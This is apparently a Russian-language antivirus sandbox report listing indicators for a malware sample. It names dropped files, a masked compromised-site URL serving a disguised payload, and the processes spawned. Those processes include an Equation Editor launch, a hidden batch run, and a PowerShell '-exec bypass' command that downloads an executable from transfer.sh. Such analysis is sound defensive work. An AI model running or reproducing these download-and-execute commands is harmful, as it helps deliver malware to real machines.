Техническая информация
- '%APPDATA%\binex.exe'
- ffnqv.exe
- %APPDATA%\binex.exe
- %TEMP%\lqef33jtaznnb
- %TEMP%\gouymp
- %TEMP%\ffnqv.exe
- %TEMP%\e0cd.tmp\e0dd.tmp\e0fd.bat
- %TEMP%\e0cd.tmp\e0dd.tmp\e0fd.bat
- 'sa#####edesrectora.cl':80
- http://sa#####edesrectora.cl/wp-content/plugins/ywjnmetzpw/grace.jpg
- DNS ASK sa#####edesrectora.cl
- '%TEMP%\ffnqv.exe' %TEMP%\gouymp
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E0CD.tmp\E0DD.tmp\E0FD.bat %TEMP%\ffnqv.exe %TEMP%\gouymp"' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E0CD.tmp\E0DD.tmp\E0FD.bat %TEMP%\ffnqv.exe %TEMP%\gouymp"
- '<SYSTEM32>\attrib.exe' +h shams
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass "Invoke-WebRequest -OutFile kmshost.exe -Uri https://transfer.sh/lR2gnE/kmshost.exe"